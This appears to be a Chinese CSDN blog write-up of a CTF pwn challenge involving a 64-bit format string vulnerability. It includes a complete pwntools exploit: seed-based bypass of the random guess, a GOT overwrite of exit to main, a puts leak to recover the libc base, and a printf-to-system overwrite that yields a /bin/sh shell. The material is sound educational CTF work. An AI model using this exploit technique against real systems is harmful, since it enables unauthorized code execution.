英招杯pwn1(字符串格式化漏洞)

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量310 收藏 2
点赞数
分类专栏: PWN 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53928256/article/details/127893122
版权

程序下载地址<提取码:play>

程序分析

逆向分析

分析过程

exp

fmtstr_payload()函数使用

printf手动修改got表

程序分析

image-20221115163848440

可以看到程序为64位程序

开启了Canary和NX

未开启PIE(难度降低)

逆向分析

image-20221115164114501

首当其冲的main函数,直接就可以发现存在字符串格式化漏洞;

在观察我们可以发现,我们此处只能利用一次字符串格式化漏洞;

所以我们需要想办法进行多次利用才能够实现getshell的目的;(经典 比赛想不到,赛后马后炮)

我们在进入CheckIn()函数中观察一下

image-20221115164423200

我们可以发现这里是一个guessnum的结构

就是要我们猜数字,只有输入的数值正确才能进入下一轮的字符串格式化漏洞的利用;

这里涉及到一个知识点:

srand是一个伪随机函数,当种子相同时,产生的随机数序列是相同的。所以我们可以通过相同的种子来绕过这个CheckIn()函数

生成随机数代码,通过ctypes包下的cdll来加载libc,这样才能执行libc下的函数

dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
dll.srand(dll.time(0))
rand = dll.rand()%5 + 48
p.sendlineafter(b"enter:", chr(rand))
log.success(f'rand num: {rand}')

分析过程

偏移计算

最简单的偏移观察,我们通过下面的输入来观察

payload = b'aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'

观察aaaa出现在那个位置

image-20221115231444911

根据输出我们可以发现输入值的位置与存储的位置偏移量为8

地址泄露

输出对应puts函数的地址

puts_got的地址可以直接从IDA中寻找,也可以利用.got[‘puts’]方法

payload = b'AAAAAAAA' + b'%10$saaa' + p64(puts_got)

即可将puts函数的真实地址泄露出来,即可获得对应的libc版本和基址,方便我们后面的操作;

image-20221115232537626

漏洞利用

突破CheckIn()函数

之前已经说过了,通过相同的种子即可突破CheckIn()函数

根据地址泄露即可知道远程的libc版本,只要利用对应的libc版本即可

dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
dll.srand(dll.time(0))
rand = dll.rand()%5 + 48
p.sendlineafter(b"enter:", chr(rand))
log.success(f'rand num: {rand}')

突破printf单次利用

这里我们要实现的就是将exit函数的got表修改为main函数

使最后执行的指令不是exit,而是main,即成功实现多次利用。

payload =  fmtstr.fmtstr_payload(8, {exit_got: main_addr}, numbwritten=0, write_size='byte')

p.sendlineafter(b'ylogan: ', payload)

当然也可以选择手动构造payload去修改,但是我发现exit_got表存储的值有点奇怪。

可能需要修改8个字节的数据,太麻烦了!咱们直接调包吧!(当然也非常建议去了解一下内部原理,请参考 printf手动修改got表

完成这步以后,剩下的就相当容易了。

根据地址泄露我们已经能确定对应的libc版本,加载对应的libc,即可获得libc的基址

然后就可以获得system函数的加载地址

然后修改printf的got表为system函数的地址

最后通过程序中原本就有的read函数输入参数 /bin/sh

即可完成getshell。

exp

from pwn import *
from LibcSearcher import *
from ctypes import *

context(os='linux', arch='amd64', log_level='debug')

# p = remote('43.139.145.52', 9001)
p = process('./pwn1')
elf = ELF('./pwn1')
puts_got = elf.got['puts']
exit_got = elf.got['exit']
printf_got = elf.got['printf']
log.success(f'printf_got: {hex(printf_got)}')
log.success(f'puts_got: {hex(puts_got)}')
log.success(f'exit_got: {hex(exit_got)}')

# srand是伪随机函数,当输入的种子相同时,产生的随机数序列是一致的
dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def sendrand():
	dll.srand(dll.time(0))
	rand = dll.rand()%5 + 48
	p.sendlineafter(b'enter:', chr(rand).encode())
	log.success(f'rand num: {rand}')

# # 根据字符串格式化漏洞算出偏移为8
# payload = b'aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'
# payload = b''
# payload += b'%' + str(cnt) + b'c%8$hhn'
# payload += p64(exit_got+2)

# get the addr from ida
main_addr = 0x400906

sendrand()
# change the exit_got to main_addr
payload =  fmtstr.fmtstr_payload(8, {exit_got: main_addr}, numbwritten=0, write_size='byte')
p.sendlineafter(b'ylogan: ', payload)

sendrand()
payload = b'aaaa%9$s' + p64(puts_got)
p.sendlineafter(b'ylogan: ', payload)
p.recvuntil(b'aaaa')
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
log.success(f'puts_addr: {hex(puts_addr)}')

libc_base = puts_addr - libc.symbols['puts']
log.success(f'libc_base: {hex(libc_base)}')

system_addr = libc_base + libc.symbols['system']
log.success(f'system_addr: {hex(system_addr)}')

sendrand()
payload = fmtstr.fmtstr_payload(8, {printf_got:system_addr}, numbwritten=0, write_size='byte')
p.sendlineafter(b'ylogan: ', payload)

sendrand()
p.sendlineafter(b'ylogan: ', b'/bin/sh')

p.interactive()

fmtstr_payload()函数使用

fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)

第一个参数offset表示格式化字符串的偏移;

第二个参数writes表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数改为system函数地址,就写成{printfGOT:systemAddress};

第三个参数numbwritten表示已经输出的字符个数,这里没有,为0,采用默认值即可;

第四个参数write_size表示写入方式,是按字节(byte)、按双字节(short)还是按四字(int),对应着hhn、hn和n,默认值是byte,即按hhn写。

fmtstr_payload函数返回的就是payload

printf手动修改got表

64位格式化字符串漏洞修改got表利用详解-安全客 - 安全资讯平台 (anquanke.com)

想要学习手动修改got表可以参看该篇博客,可以说写得相当详细!!!

C4ndy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn-2019-pwn
11-29
- **daily** 文件可能是一个模拟日常应用的程序,可能存在常见的安全漏洞,如缓冲区溢出或格式字符串漏洞。 - **your_pwn** 文件可能是一个定制的环境,要求参赛者根据特定的情境来编写exploit。 - **baby_pwn** ...
[BUUCTF]PWN1——test_your_nc
mcmuyanga的博客
08-23 2678
[BUUCTF]-test_your_nc 题目网址:https://buuoj.cn/challenges#test_your_nc 步骤: 根据题目提示,nc一下靶场 2.nc连接上后ls一下看看当前目录,看到了flag的,直接cat flag读出内容
[攻防世界 pwn]——pwn1(内涵peak小知识)
Y_peak的博客
02-28 599
[攻防世界 pwn]——pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇见printf函数,并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s,打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。 遇见可以利用的栈溢出gets函数,如果有puts函数,或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清
pwn刷题num15----格式化字符串漏洞
tbsqigongzi的博客
04-22 348
攻防世界pwn进阶区实时数据监测 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO—got仍可写 未开启canary保护—存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ...
格式化字符漏洞
IT_huanhuan的博客
05-25 1113
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
非栈上的格式化字符串漏洞
Grxer的博客
03-20 748
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串got
mcmuyanga的博客
01-27 2504
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
inndy_echo2
z1r0的博客
03-25 657
inndy_echo2 查看保护 64位下的格式化漏洞泄露出基址,再泄露出libc。改exit为one_gadget,exit退出就会getshell。 pwndbg运行至printf这里看一下stack就可以发现41和43可以拿到两个地址,再算出one_gadget。这里笔者进行格式化漏洞攻击的时候选定的是ljust(16, b'\x00') + exit_addr。exit_addr。刚好exit_addr放在了偏移为8。分开写,两个字节两个字节写。 from pwn import * from
PWN测试题目
07-18
2. **格式字符串漏洞**:利用printf等函数的格式化字符串特性,可以修改内存中的内容。理解格式化字符串的工作原理和相关的安全限制是解决这类问题的关键。 3. **堆操作**:包括Fastbin Dup、Unsorted Bin Attack、...
CTF中的其他漏洞1
08-03
1. **格式化字符串漏洞**: 格式化字符串漏洞通常出现在使用`printf`、`fprintf`、`sprintf`等函数时,由于对输入的格式字符串处理不当,攻击者可以控制输出内容,甚至改变程序内存中的数据。例如,`fmtstr="%%$22p...
pwn栈溢出10道练习题有writeup
01-04
4. **格式字符串漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。学习如何识别和利用这些漏洞是pwn题目的常见部分。 5. **堆溢出**:虽然题目主要关注栈溢出,但...
pwn:Pwn技术的集合
05-13
2. **格式字符串漏洞**:利用C语言中的格式化字符串函数,如`printf`,攻击者可以通过特殊的输入来读取内存或者修改内存内容。 3. **堆溢出**:与栈溢出类似,但发生在程序的堆分配区域。理解堆的管理机制对于利用...
printf 格式化 输出_64位格式化字符串漏洞修改got利用详解
weixin_39631295的博客
11-27 1245
前言格式化字符串漏洞是最基础也是很老的一个漏洞了,网上一搜索就会有一堆的解释、原理、以及利用,但全都是对32位的格式化漏洞的解析,64位的几乎没有,就算有也被一笔带过。但是当你利用格式化漏洞来修改64位elf的got时,你会发现并没有详细的那么简单,虽然和32位的原理一样,但payload的构建方法却有所差别。甚至难度也大大增加故此有了此处尝试以及尝试后的一些总结漏洞分析程序源码:#...
【Pwn】printf漏洞
weixin_52553215的博客
03-10 1090
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
pwn 格式化字符串漏洞及例题
limenzzz的博客
10-21 1832
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
pwn学习资料整理——x64中的printf回显漏洞
recover517的博客
08-04 371
利用printf打印栈中内容 B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。 IDA伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-30h] BYREF char buf[16]; // [rsp+20h] [rbp-10h] BYREF setvbuf(stdin, 0L
好好说话之64位格式化字符串漏洞
hollk’s blog
08-06 2850
64位格式化字符串和32位的很相似,做题的步骤也相同,唯一不同的是64位程序对函数参数存储的方式和32位的不同。64为程序会优先将函数的前6个参数放置在寄存器中,超过6个的再存放在栈上,而32位直接存放在栈上。寄存器存放顺序可以看我之前写的好好说话之ret2csu 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 例题选自2017-UIUCTF-pwn200-GoodLuck checksec搞一下 64位程序,开启了NX保护、Canary。因为我们知道这是一道格式化字符串的题
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2494
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 986
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
字符串格式化漏洞 pwn fmstr
05-17
字符串格式化漏洞(Format String Vulnerability)是指在程序中调用格式化输出函数时,由于未正确限制参数中“%”符号的使用而导致的漏洞。攻击者可以利用这种漏洞来读取内存中的任意数据,或者在栈上执行任意代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值